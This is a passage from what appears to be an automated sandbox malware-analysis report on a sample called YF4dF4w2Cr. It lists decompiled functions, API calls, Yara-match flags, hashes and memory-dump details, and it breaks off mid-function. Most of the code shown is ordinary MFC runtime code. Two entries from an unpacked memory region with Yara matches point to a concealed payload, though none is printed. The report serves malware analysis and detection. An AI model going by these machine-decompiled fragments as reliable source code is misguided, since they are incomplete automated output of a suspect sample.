                  • Opcode ID: bec3e7c349587959f3f3a5d667ce40e4d702164f44e17a31be0c72cee9323074
                  • Instruction ID: ae2ac06b7a0ce37aa17b41ea6ab59d3da5e809432c51fcdedcd5433f9036f37a
                  • Opcode Fuzzy Hash: bec3e7c349587959f3f3a5d667ce40e4d702164f44e17a31be0c72cee9323074
                  • Instruction Fuzzy Hash: A31160B1A01128BBCF209E969C08DEFBFBDEF85750F144016FA09A2240D6704D16DBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1F56, Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 023E1F6B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 40122b5b0a7fcf9669c5d7933e56c3566cb188d6ffa2182b30297815d72d5629
                  • Instruction ID: 434fa287ae2927df5fd486419fa217eedea6ecf332b42c5b64eb4b0000fe26d8
                  • Opcode Fuzzy Hash: 40122b5b0a7fcf9669c5d7933e56c3566cb188d6ffa2182b30297815d72d5629
                  • Instruction Fuzzy Hash: 68C012B055030CBBE614CB40DD0AFBA776CD744714F404288BE045229196B15E1055B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430191, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45registryclipboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00430191(intOrPtr* __ecx) {
				intOrPtr* _t26;

				_t26 = __ecx;
				 *_t26 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t26;
			}




                  0x004301a0
                  0x004301a9
                  0x004301b2
                  0x004301bc
                  0x004301c6
                  0x004301d0
                  0x004301da
                  0x004301e4
                  0x004301ee
                  0x004301f8
                  0x00430202
                  0x0043020c
                  0x00430211
                  0x00430218

                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 004301A2
                  • RegisterClipboardFormatA.USER32 ref: 004301AB
                  • RegisterClipboardFormatA.USER32 ref: 004301B5
                  • RegisterClipboardFormatA.USER32 ref: 004301BF
                  • RegisterClipboardFormatA.USER32 ref: 004301C9
                  • RegisterClipboardFormatA.USER32 ref: 004301D3
                  • RegisterClipboardFormatA.USER32 ref: 004301DD
                  • RegisterClipboardFormatA.USER32 ref: 004301E7
                  • RegisterClipboardFormatA.USER32 ref: 004301F1
                  • RegisterClipboardFormatA.USER32 ref: 004301FB
                  • RegisterClipboardFormatA.USER32 ref: 00430205
                  • RegisterClipboardFormatA.USER32 ref: 0043020F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                  • API String ID: 1228543026-2889995556
                  • Opcode ID: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction ID: 7eabd4f5f4dbb38bd0e4f7e30e0aa98beb580e07856e0c8e74aebad56863afda
                  • Opcode Fuzzy Hash: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction Fuzzy Hash: 2501E174E41B55B6C7106F729C1D91A7EA1FE447617604927A41C87641DBBCE054CFC8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410CBA, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00410CBA(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				signed int _t56;
				signed int _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E00431B04(E0044B0DA, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x406452);
				 *(_t116 - 0x120) = _t110;
				_t54 = E00420AEC(_t94, 0x466508, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E00406436(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t56 =  *(E0041F363(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					__eflags = _t111;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x4668d4;
						if( *0x4668d4 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x4664a4;
								if( *0x4664a4 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x4664a4; // 0x8000
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										 *(_t116 - 0x14) = _t59;
										__eflags = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E00410B6D);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E00431160(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040D4AB(_t94, _t97, _t106, "#32768", __eflags);
								 *0x4664a4 = _t72;
								__eflags = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E004336E0(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0041F3AF(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E0040EE89(_t111, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040F720);
							__eflags = _t83 - E0040F720;
							if(_t83 != E0040F720) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E0041EAC0();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E0040D6F3(_t87, "ime");
						_pop(_t97);
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E00431B87(_t94, _t105, _t110);
				}
			}


























                  0x00410cba
                  0x00410cba
                  0x00410cba
                  0x00410cc4
                  0x00410cc9
                  0x00410ccc
                  0x00410ccf
                  0x00410cd9
                  0x00410cdf
                  0x00410ce6
                  0x00410ce8
                  0x00410ceb
                  0x00410cf1
                  0x00410cf3
                  0x00410cf5
                  0x00410cf5
                  0x00410cfe
                  0x00410d13
                  0x00410d15
                  0x00410d1d
                  0x00410d21
                  0x00410d27
                  0x00410d29
                  0x00410d40
                  0x00410d40
                  0x00410d47
                  0x00410d94
                  0x00410d94
                  0x00410d96
                  0x00410dfe
                  0x00410e06
                  0x00410e42
                  0x00410e4e
                  0x00410e55
                  0x00410e87
                  0x00410e8a
                  0x00410e90
                  0x00410e93
                  0x00410e95
                  0x00410e9d
                  0x00410ea4
                  0x00410ea6
                  0x00410ea8
                  0x00410eaf
                  0x00410eb7
                  0x00410eb9
                  0x00410ebc
                  0x00410ebf
                  0x00410ecd
                  0x00410ecd
                  0x00410ebc
                  0x00410ea8
                  0x00410ed3
                  0x00410ed9
                  0x00410ee5
                  0x00410eeb
                  0x00410ef2
                  0x00410ef4
                  0x00410ef9
                  0x00410eff
                  0x00410eff
                  0x00410eff
                  0x00410eff
                  0x00000000
                  0x00410f03
                  0x00000000
                  0x00410e57
                  0x00410e0a
                  0x00410e15
                  0x00410e20
                  0x00410e26
                  0x00410e2c
                  0x00410e2d
                  0x00410e2f
                  0x00410e37
                  0x00410e3d
                  0x00410e40
                  0x00410e66
                  0x00410e6c
                  0x00410e6e
                  0x00000000
                  0x00000000
                  0x00410e78
                  0x00410e7c
                  0x00410e83
                  0x00410e85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410e85
                  0x00000000
                  0x00410e40
                  0x00410d9e
                  0x00410da3
                  0x00410daa
                  0x00410db3
                  0x00410dc9
                  0x00410dcb
                  0x00410dd1
                  0x00410dd3
                  0x00410dd5
                  0x00410dd5
                  0x00410ddd
                  0x00410de1
                  0x00410de5
                  0x00410de9
                  0x00410def
                  0x00410df2
                  0x00410df4
                  0x00410df4
                  0x00000000
                  0x00410de9
                  0x00410d4c
                  0x00410d52
                  0x00410d57
                  0x00000000
                  0x00000000
                  0x00410d5d
                  0x00410d60
                  0x00410d65
                  0x00410d72
                  0x00410d76
                  0x00410d7c
                  0x00410d7c
                  0x00410d85
                  0x00410d8b
                  0x00410d8c
                  0x00410d8e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410d8e
                  0x00410d2b
                  0x00410d32
                  0x00000000
                  0x00000000
                  0x00410d38
                  0x00410d3a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410d00
                  0x00410d08
                  0x00410f05
                  0x00410f0a
                  0x00410f0a

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00410CC4
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • CallNextHookEx.USER32 ref: 00410D08
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClassLongA.USER32 ref: 00410D4C
                  • GlobalGetAtomNameA.KERNEL32 ref: 00410D76
                  • SetWindowLongA.USER32 ref: 00410DCB
                  • _memset.LIBCMT ref: 00410E15
                  • GetClassLongA.USER32 ref: 00410E45
                  • GetClassNameA.USER32(?,?,00000100), ref: 00410E66
                  • GetWindowLongA.USER32 ref: 00410E8A
                  • GetPropA.USER32 ref: 00410EA4
                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 00410EAF
                  • GetPropA.USER32 ref: 00410EB7
                  • GlobalAddAtomA.KERNEL32 ref: 00410EBF
                  • SetWindowLongA.USER32 ref: 00410ECD
                  • CallNextHookEx.USER32 ref: 00410EE5
                  • UnhookWindowsHookEx.USER32(?), ref: 00410EF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423$ime
                  • API String ID: 1191297049-4034971020
                  • Opcode ID: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction ID: 32270c68322271c2e59bf9d54f63d676ca0dffc6bbc1c643ca40a15bfc5c9aae
                  • Opcode Fuzzy Hash: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction Fuzzy Hash: 1061E43150031AABCB219B62DC09BEF7B78FF05325F100566F505A6291DBB8DAC1CBAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E8D0A, Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 436libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E9CDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ro$!x,5$)Zk$,UiB$:@Q^$;.\$>7$@}$SL2X$]|F,$c$tW/$u-0V${!*2$YsV$^qr
                  • API String ID: 1029625771-3671267125
                  • Opcode ID: f0c98bba408d365c3d39793b58438ca7727ec4ca2c6bac6694add71fa4d79833
                  • Instruction ID: a54907bc7758daa0eb944bcb75305b91311134d3d2446fd37fc4abf3892deea6
                  • Opcode Fuzzy Hash: f0c98bba408d365c3d39793b58438ca7727ec4ca2c6bac6694add71fa4d79833
                  • Instruction Fuzzy Hash: 9872B5F48567A98FDB61CF419E8478EBB35BB51305F5082C8C26C3A214CB750B86CF8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C354, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040C354() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x466334 - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x466338 = E0040C2FA(_t17, _t21, __eflags);
					_t19 = GetModuleHandleA("USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L12:
						 *0x466318 = _t17;
						 *0x46631c = _t17;
						 *0x466320 = _t17;
						 *0x466324 = _t17;
						 *0x466328 = _t17;
						 *0x46632c = _t17;
						 *0x466330 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x466318 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x46631c = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x466320 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x466324 = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x46632c = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
											 *0x466328 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
												 *0x466330 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x466334 = 1;
					return _t5;
				} else {
					_t25 =  *0x466328 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}



















                  0x0040c357
                  0x0040c359
                  0x0040c35f
                  0x0040c36e
                  0x0040c37a
                  0x0040c385
                  0x0040c387
                  0x0040c389
                  0x0040c41d
                  0x0040c41d
                  0x0040c423
                  0x0040c429
                  0x0040c42f
                  0x0040c435
                  0x0040c43b
                  0x0040c441
                  0x0040c447
                  0x0040c38f
                  0x0040c39b
                  0x0040c39d
                  0x0040c3a2
                  0x0040c3a4
                  0x00000000
                  0x0040c3a6
                  0x0040c3ac
                  0x0040c3ae
                  0x0040c3b3
                  0x0040c3b5
                  0x00000000
                  0x0040c3b7
                  0x0040c3bd
                  0x0040c3bf
                  0x0040c3c4
                  0x0040c3c6
                  0x00000000
                  0x0040c3c8
                  0x0040c3ce
                  0x0040c3d0
                  0x0040c3d5
                  0x0040c3d7
                  0x00000000
                  0x0040c3d9
                  0x0040c3df
                  0x0040c3e1
                  0x0040c3e6
                  0x0040c3e8
                  0x00000000
                  0x0040c3ea
                  0x0040c3f0
                  0x0040c3f2
                  0x0040c3f7
                  0x0040c3f9
                  0x00000000
                  0x0040c3fb
                  0x0040c401
                  0x0040c403
                  0x0040c408
                  0x0040c40a
                  0x00000000
                  0x0040c40c
                  0x0040c40e
                  0x0040c40e
                  0x0040c40e
                  0x0040c40a
                  0x0040c3f9
                  0x0040c3e8
                  0x0040c3d7
                  0x0040c3c6
                  0x0040c3b5
                  0x0040c3a4
                  0x0040c411
                  0x0040c41c
                  0x0040c361
                  0x0040c363
                  0x0040c36d
                  0x0040c36d

                  APIs
                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,0040C4A9,?,?,?,?,?,?,?,0040E929,00000000,00000002,00000028), ref: 0040C37F
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040C39B
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040C3AC
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040C3BD
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040C3CE
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040C3DF
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040C3F0
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040C401
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-68207542
                  • Opcode ID: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction ID: 97ffdccdbcf6cb09da46b2faea870da2eca337babe3f4635d63e23a0ead0a9a5
                  • Opcode Fuzzy Hash: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction Fuzzy Hash: 792150B1E10260ABC3115FB5ACC482A7EE8B28CB05362453FEC01E3352E3B850C99E5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B10C, Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 394stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0040B10C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t148;
				void* _t157;
				int _t191;
				int _t223;
				int _t225;
				int _t227;
				int _t230;
				intOrPtr* _t240;
				intOrPtr* _t241;
				intOrPtr* _t249;
				intOrPtr* _t250;
				signed int* _t252;
				int _t259;
				int _t261;
				void* _t264;
				int _t314;
				int _t339;
				int _t340;
				int _t346;
				struct HWND__** _t347;
				int _t348;
				int _t349;
				struct tagMENUITEMINFOA _t350;
				int _t351;
				void* _t353;
				void* _t356;

				_t356 = __eflags;
				_t335 = __edx;
				_push(0x174);
				E00431A9B(E0044AF14, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
				E004014C0(_t353 - 0x10, __edx);
				_t337 = lstrlenA;
				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
				_t346 = lstrlenA("ReBarWindow32") + 1;
				_t148 = E004014F0(_t353 - 0x10, _t346);
				_t347 =  *(_t353 + 0xc);
				GetClassNameA( *_t347, _t148, _t346);
				E0040A356(_t353 - 0x10, 0xffffffff);
				 *(_t353 - 0x14) = E0040EE68(_t353 - 0x10, lstrlenA, _t347, _t356,  *_t347);
				if(E00409F00(_t353 - 0x10, _t335, "ReBarWindow32") != 0) {
					L37:
					_t348 = 0;
					L6:
					E004010B0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0, _t335);
					return E00431B73(_t348);
				}
				_t259 =  *(_t353 - 0x14);
				if(_t259 == 0 || E0041E99D(_t259, "@;E") == 0) {
					goto L37;
				} else {
					_t157 = E0040F898(_t259);
					if(_t157 == 0) {
						L7:
						E0041F754(_t259, _t353 - 0x78, _t337, _t347, __eflags);
						E004014C0(_t353 + 8, _t335);
						E004014C0(_t353 + 0xc, _t335);
						 *(_t353 - 4) = 3;
						E00422859(_t353 - 0x4c);
						_push( *((intOrPtr*)(_t353 - 0x18)));
						 *(_t353 - 4) = 4;
						E00422E1F(_t259, _t353 - 0xac, _t337, _t347, __eflags);
						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
						 *(_t353 - 4) = 5;
						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
						E004087FA(_t259, _t347[3], _t353 - 0x180);
						E00408830(_t259, _t347[3], _t353 - 0x88);
						_t260 = "ToolbarWindow32";
						_t339 = lstrlenA("ToolbarWindow32") + 1;
						GetClassNameA( *(_t353 - 0x160), E004014F0(_t353 - 0x10, _t339), _t339);
						E0040A356(_t353 - 0x10, 0xffffffff);
						_t340 = E0040EE68(_t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
						 *(_t353 - 0x58) = _t340;
						__eflags = E00409F00(_t353 - 0x10, _t335, "ToolbarWindow32");
						if(__eflags != 0) {
							L36:
							 *(_t353 - 4) = 4;
							E00422E73(_t260, _t353 - 0xac, _t340, _t347, __eflags);
							 *(_t353 - 4) = 3;
							E00422E06(_t353 - 0x4c);
							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
							 *(_t353 - 4) = 0;
							E0040AED0(_t260, _t353 - 0x78, _t340, _t347, __eflags);
							goto L37;
						}
						__eflags = _t340;
						if(__eflags == 0) {
							goto L36;
						}
						__eflags = E0041E99D(_t340, 0x44fc0c);
						if(__eflags == 0) {
							goto L36;
						}
						_t349 =  &(_t347[6]);
						__eflags = _t349;
						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
						 *(_t353 - 0x54) = _t349;
						E00422C3C( *(_t353 - 0x14), _t353 - 0x88);
						E00422BFB(_t340, _t353 - 0x88);
						_t261 = E00406ACA(_t340);
						 *(_t353 - 0x14) = _t261;
						while(1) {
							_t261 = _t261 - 1;
							 *(_t353 - 0x24) = _t261;
							E004087FA(_t340, _t261, _t353 - 0xec);
							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
							__eflags = _t191;
							if(_t191 != 0) {
								break;
							}
							__eflags = _t261;
							if(_t261 > 0) {
								continue;
							}
							break;
						}
						_t350 = 0x30;
						E00431160(_t340, _t353 - 0xdc, 0, _t350);
						 *(_t353 - 0xdc) = _t350;
						 *(_t353 - 0x28) = E00408817(_t340);
						E00423999(_t353 - 0x3c);
						 *((intOrPtr*)(_t353 - 0x3c)) = 0x44fff0;
						 *(_t353 - 4) = 6;
						E00425F9A(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
						E0041F51D(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
						E0040876B(_t353 - 0x4c, _t353 - 0xac);
						_t351 = 0;
						while(1) {
							__eflags = _t261 -  *(_t353 - 0x14);
							if(__eflags >= 0) {
								break;
							}
							E00406956(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
							__eflags =  *(_t353 - 0x50) & 0x00000001;
							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
								__eflags = _t351;
								if(_t351 == 0) {
									L29:
									_t261 = _t261 + 1;
									__eflags = _t261;
									 *(_t353 - 0x24) = _t261;
									continue;
								}
								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
								L28:
								InsertMenuItemA( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
								goto L29;
							}
							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
							_t223 = E00402720(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
							__eflags = _t223;
							if(_t223 == 0) {
								E00401E30(_t353 + 0xc);
							} else {
								E0041B29E(_t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
							}
							_t225 = E00404461(__eflags, 8);
							__eflags = _t225;
							if(_t225 == 0) {
								_t225 = 0;
								__eflags = 0;
							} else {
								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
								 *_t225 = 0x4502c8;
							}
							E004260C0(_t261, _t353 - 0x3c, _t351, _t225);
							_t227 =  *(_t353 - 0x28);
